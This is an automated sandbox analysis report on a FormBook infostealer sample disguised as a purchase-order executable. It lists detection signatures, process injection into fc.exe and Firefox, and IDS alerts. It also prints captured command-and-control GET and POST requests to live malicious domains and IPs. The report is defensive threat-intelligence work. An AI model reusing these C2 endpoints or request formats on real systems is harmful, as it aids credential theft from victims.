Windows Analysis Report
PO No. 0146850827805 HSP00598420.exe

Overview

General Information

Sample name: PO No. 0146850827805 HSP00598420.exe
Analysis ID: 1592547
MD5: bd83674d593f0dbb40a73b74046e5e9c
SHA1: cd27963d0fee77c8defd60da3db84e271c6eba91
SHA256: 544af6e22350e213364a80dda48697330f3fb55e542df51a0686a0e4861a8a2a
Tags: exe, user-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO No. 0146850827805 HSP00598420.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe" MD5: BD83674D593F0DBB40A73B74046E5E9C)
    • DlLArodfwUXcDj.exe (PID: 3304 cmdline: "C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 6548 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • firefox.exe (PID: 6976 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

              AV Detection

              Source: PO No. 0146850827805 HSP00598420.exe, Avira: detected
              Source: http://www.adadev.info/ctdy/, Avira URL Cloud: Label: malware
              Source: http://www.adadev.info/ctdy/?ml=PF-8nXUHD&R4Stj2k=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZHUsO9SJV5WPis6dAAfaCKHAM87QjltbifMPVPoLSKwbdMw==, Avira URL Cloud: Label: malware
              Source: http://www.gayhxi.info/k2i2/?R4Stj2k=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTaAffH6Ebl78vR8bpDnW8pt5wmDRx2PwDjv0U4337vN//Tw==&ml=PF-8nXUHD, Avira URL Cloud: Label: malware
              Source: http://www.promocao.info/zaz4/, Avira URL Cloud: Label: malware
              Source: http://www.promocao.info/zaz4/?R4Stj2k=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddjkJxjmB725u/4P9m9WNTMgvCSsWrKIDHmR4Q2StU9f7tIQ==&ml=PF-8nXUHD, Avira URL Cloud: Label: malware
              Source: PO No. 0146850827805 HSP00598420.exe, Virustotal: Detection: 69%
              Source: PO No. 0146850827805 HSP00598420.exe, ReversingLabs: Detection: 68%
              Source: Yara match, File source: 0.2.PO No. 0146850827805 HSP00598420.exe.f10000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000004.00000002.3919504279.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2422961999.0000000005A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3926275354.0000000008440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2418703571.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.3920082555.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.3920171472.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.3920397657.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2419345292.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
              Source: PO No. 0146850827805 HSP00598420.exe, Joe Sandbox ML: detected
              Source: PO No. 0146850827805 HSP00598420.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: PO No. 0146850827805 HSP00598420.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DlLArodfwUXcDj.exe, 00000003.00000002.3919488077.00000000003FE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.00000000010FE000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2420588892.00000000036C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003870000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2418064008.0000000003518000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: PO No. 0146850827805 HSP00598420.exe, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.00000000010FE000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000004.00000002.3920347727.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2420588892.00000000036C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003870000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2418064008.0000000003518000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\SysWOW64\fc.exe, Code function: 4_2_030DC870 FindFirstFileW,FindNextFileW,FindClose, 4_2_030DC870
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe, Code function: 4x nop then pop edi, 3_2_08482EA2
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe, Code function: 4x nop then pop edi, 3_2_08482F0D
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe, Code function: 4x nop then pop edi, 3_2_08471F1C
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe, Code function: 4x nop then xor eax, eax, 3_2_08477780
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe, Code function: 4x nop then pop edi, 3_2_08473FA1
              Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then xor eax, eax, 4_2_030C9EC0
              Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then pop edi, 4_2_030CE4C7
              Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then mov ebx, 00000004h, 4_2_037104CE

              Networking

              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49915 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49915 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49978 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49987 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49987 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49999 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49983 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49983 -> 172.67.182.198:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49975 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49976 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49978 -> 84.32.84.32:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50003 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50003 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49995 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 134.122.133.80:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 154.197.162.239:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50007 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49991 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 47.83.1.90:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 199.192.21.169:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 188.114.96.3:80
              Source: Joe Sandbox View, IP Address: 154.197.162.239
              Source: Joe Sandbox View, IP Address: 172.67.182.198
              Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /k2i2/?R4Stj2k=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTaAffH6Ebl78vR8bpDnW8pt5wmDRx2PwDjv0U4337vN//Tw==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.gayhxi.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /zaz4/?R4Stj2k=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddjkJxjmB725u/4P9m9WNTMgvCSsWrKIDHmR4Q2StU9f7tIQ==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.promocao.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /kxtt/?R4Stj2k=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXj2cOA9AsjjYxFgIbzI/ZykrVUFshkofZlIAuVzcX4MBGxA==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.grimbo.boatsConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /a59t/?R4Stj2k=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acsoaYUTukUw5/VlLJHlB4H68wgcF/MAlZiH8mu7MSOf5Syg==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44756.pizzaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /bowc/?R4Stj2k=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO84RxecymeNEzyLIaWcKrL+RZ5eMRfwg+qeUwmqwyFGBk9g==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /cf9p/?R4Stj2k=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFI57Xl4izZbo5Nf+t7hBu9DYDZsVVcrRpMjG9JV+RkwAygg==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.investshares.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /jpjz/?R4Stj2k=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcXHKBDP7KaxaAnbP80R2HqmHJM+3O9yicYOmuDElRRJIzTA==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /ctdy/?ml=PF-8nXUHD&R4Stj2k=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZHUsO9SJV5WPis6dAAfaCKHAM87QjltbifMPVPoLSKwbdMw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adadev.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH4gP8KF2Qn8j/cmS57RgWwvqcfmQWCIyf50xkCSEufT28mA==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cifasnc.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global traffic, DNS traffic detected: DNS query: www.gayhxi.info
              Source: global traffic, DNS traffic detected: DNS query: www.promocao.info
              Source: global traffic, DNS traffic detected: DNS query: www.grimbo.boats
              Source: global traffic, DNS traffic detected: DNS query: www.44756.pizza
              Source: global traffic, DNS traffic detected: DNS query: www.lonfor.website
              Source: global traffic, DNS traffic detected: DNS query: www.investshares.net
              Source: global traffic, DNS traffic detected: DNS query: www.nosolofichas.online
              Source: global traffic, DNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
              Source: global traffic, DNS traffic detected: DNS query: www.adadev.info
              Source: global traffic, DNS traffic detected: DNS query: www.cifasnc.info
              Source: global traffic, DNS traffic detected: DNS query: www.ebsmadrid.store
              Source: unknownHTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 52 34 53 74 6a 32 6b 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 74 65 41 35 69 76 33 4c 65 4b 6e 54 61 5a 4e 73 42 56 63 79 69 5a 76 53 4e 55 45 56 54 70 63 30 51 67 46 4f 51 34 3d Data Ascii: R4Stj2k=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvteA5iv3LeKnTaZNsBVcyiZvSNUEVTpc0QgFOQ4=
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vWG%2FSM8qJ0DRVt5wzWoyamKXhz3Ag3gSbxVeTagXjq3%2B5PrmISaX54wrBoJ3ZPH5nrh19ZNPqmVnkolCU1LTFSuluDzVn5xn7eDyT9Ram51Ej17c0uZPyyy0j0SEkO4zXlk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb6780d46ab45-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13728&min_rtt=13728&rtt_var=6864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
